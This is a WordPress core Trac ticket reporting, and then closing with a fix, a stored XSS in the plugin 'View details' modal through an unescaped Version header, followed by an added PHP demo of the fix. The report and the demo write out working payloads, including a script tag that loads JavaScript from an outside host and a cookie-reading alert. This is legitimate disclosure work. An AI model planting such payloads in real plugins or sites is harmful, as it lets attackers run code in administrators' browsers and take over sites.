Make WordPress Core

Opened 3 years ago

Closed 3 years ago

#53020 closed defect (bug) (fixed)

Stored XSS via «View details» plugin iFrame

Reported by: anonymized_17160716 Owned by: SergeyBiryukov
Milestone: 5.8 Priority: normal
Severity: normal Version: 5.8
Component: Security Keywords: has-patch
Focuses: administration Cc:

Description

I found a way to use the XSS attack vector - through an iFrame with a detailed description of the plugin (plugin «View details» iFrame).

Possible operation options:

  • substitution or modification of the original plug-in to hide malicious code;
  • distribution of the modified plugin through third-party resources.

Steps To Reproduce:

  1. Open any existing plugin from the official WordPress repo, e.g. Hello Dolly.
  2. Change the version number by +1 (at a minimum), e.g. from Version: 1.7.2 to Version: 1.7.3.
  3. Add your payload right after the last digit: Version: 1.7.3<script src="https://m0ze.ru/payload.a.js"></script>
  4. Check the plugin info via the dashboard's «View details» link.

If you use the payload specifically as a <script src=...></script>, then visually, except for one digit in the plugin version, nothing will change. Other payloads also work (<script>alert(document.cookie)</script> etc.), but they add extra special characters to the right of the plugin version, which may alert the website administrator.

Screenshots:

https://i.imgur.com/7pz6UMh.png

https://i.imgur.com/E7ejGkJ.png

https://i.imgur.com/r2WQmFQ.png

Code:

/wp-admin/includes/plugin-install.php, 881-884:

case 'newer_installed':
	// $status['version'] is the Version header of the installed plugin, echoed here without escaping.
	/* translators: %s: Plugin version. */
	echo '<a class="button button-primary right disabled">' . sprintf( __( 'Newer Version (%s) Installed' ), $status['version'] ) . '</a>';
	break;

Quick fix:

strip_tags($status['version'])

Video:

YouTube short demo: https://youtu.be/_IRcQ82wovY

Impact

Malicious JavaScript code injection and the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.

There is also an unknown number of plugins that display diagnostic information about the site, including the names and versions of plugins, where this vulnerability will also be triggered, e.g. Asset CleanUp: Page Speed Booster, WP Cerber Security, Anti-spam & Malware Scan and many other plugins.

Attachments (1)

plugin-install.diff (769 bytes) - added by bmcculley 3 years ago.


Change History (7)

#1 @ayeshrajans
3 years ago

Thanks for the report @m0ze. Not without some tinkering, but I could reproduce this issue, and I think it's really something we ought to fix.

Please note that we don't use Trac to report/triage security issue. Please see SECURITY.md with full details on how to report a security vulnerability.

#2 @anonymized_17160716
3 years ago

Hi @ayeshrajans.

Please note that we don't use Trac to report/triage security issue. Please see SECURITY.md with full details on how to report a security vulnerability.

On the H1 platform, this XSS issue wasn't considered a vulnerability, so the WordPress staff member closed the report with N/A status and I was told to write all the details right here, in a new ticket.

https://i.imgur.com/KhF0cyF.png

#3 @SergeyBiryukov
3 years ago

  • Milestone changed from Awaiting Review to 5.8

Hi there, welcome to WordPress Trac! Thanks for the report.

I think we'd want to use esc_html() here instead of strip_tags(), for consistency with how contributor names are escaped earlier. Looks good to me otherwise.

#4 @anonymized_17160716
3 years ago

@SergeyBiryukov hi there. Thank you :)

I think we'd want to use esc_html() here instead of strip_tags(), for consistency with how contributor names are escaped earlier.

Yep, got it!

#5 @bmcculley
3 years ago

  • Keywords has-patch added; needs-patch removed

I wanted to note that in order to test this, if using the Hello Dolly plugin, it must first be deleted and then reinstalled so that the newer_installed case will be reached. If the one that comes by default is used, it will only go to install.

#6 @SergeyBiryukov
3 years ago

  • Owner set to SergeyBiryukov
  • Resolution set to fixed
  • Status changed from new to closed

In 50825:

Plugins: Escape the currently installed version number on Add Plugins screen.

The number is displayed in the plugin details modal if a newer version is already installed.

Props m0ze, bmcculley, ayeshrajans.
Fixes #53020.
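The reproduction steps in the report and the fix in 50825, as an added stand-alone example (this is not code from the ticket or from WordPress core). It reads the Version header out of a constructed, tampered plugin file, renders the «View details» button both the way plugin-install.php did before the fix and with esc_html() as in the changeset, and contrasts that with the strip_tags() quick fix. Assumptions: esc_html() and __() are simplified stand-ins defined here so the file runs without WordPress loaded (core's esc_html() additionally validates UTF-8); read_plugin_header() only approximates core's get_file_data()/_cleanup_header_comment() regexes; is_plausible_version() is a heuristic of my own, not a WordPress function; the plugin source is constructed for the demo.

```php
<?php
// Added example, not code from the ticket or from WordPress core.

// Stand-ins for WordPress helpers so this file runs without WordPress loaded.
// Assumption: simplified behaviour; core's esc_html() also checks UTF-8 validity.
if (!function_exists('esc_html')) {
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8', false);
    }
}
if (!function_exists('__')) {
    function __($text) { return $text; }
}

// Constructed plugin file header modelled on the report's step 3:
// the Version field carries a <script> tag right after the last digit.
$tamperedPluginSource = <<<'PLUGIN'
<?php
/**
 * Plugin Name: Hello Dolly
 * Version: 1.7.3<script src="https://m0ze.ru/payload.a.js"></script>
 */
PLUGIN;

// Pull one header field out of a plugin file, approximating what core's
// get_file_data() does: match "Field:" at the start of a comment line and
// take the rest of that line, then strip a trailing "*/" or "?>" like
// _cleanup_header_comment(). Nothing here escapes or validates the value.
function read_plugin_header(string $source, string $field): string {
    $pattern = '/^[ \t\/*#@]*' . preg_quote($field, '/') . ':(.*)$/mi';
    if (!preg_match($pattern, $source, $m)) {
        return '';
    }
    return trim(preg_replace('/\s*(?:\*\/|\?>).*/', '', $m[1]));
}

// The 'newer_installed' rendering from plugin-install.php before the fix:
// the installed version string goes into the markup unescaped.
function render_newer_installed_vulnerable(string $version): string {
    return '<a class="button button-primary right disabled">'
        . sprintf(__('Newer Version (%s) Installed'), $version) . '</a>';
}

// The same rendering after changeset 50825: the version is passed through esc_html().
function render_newer_installed_fixed(string $version): string {
    return '<a class="button button-primary right disabled">'
        . sprintf(__('Newer Version (%s) Installed'), esc_html($version)) . '</a>';
}

// Heuristic of my own (not a WordPress function) for plugins that display
// version strings themselves, as the Impact section describes: a version
// header that contains anything beyond these characters deserves a closer look.
function is_plausible_version(string $version): bool {
    return (bool) preg_match('/^[0-9A-Za-z.+\-]{1,32}$/', $version);
}

$version = read_plugin_header($tamperedPluginSource, 'Version');

echo "Parsed Version header: " . $version . "\n";
echo "Vulnerable output:     " . render_newer_installed_vulnerable($version) . "\n";
echo "Escaped output:        " . render_newer_installed_fixed($version) . "\n";
echo "strip_tags() output:   " . strip_tags($version) . "\n";
echo "Plausible version?     " . (is_plausible_version($version) ? 'yes' : 'no') . "\n";
```

Run it with `php example.php`. The vulnerable rendering emits the `<script>` element verbatim inside the button markup, so the browser loads it when the modal is shown; the esc_html() rendering encodes `<`, `>` and `"` so the same string is displayed as text. strip_tags() would also defuse this particular payload, but it does so by silently deleting the markup, leaving the administrator looking at a clean "1.7.3" with no trace of the tampered header, whereas esc_html() shows the header's actual content and matches how the contributor names in the same modal are already escaped, which is the consistency point raised in comment #3.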
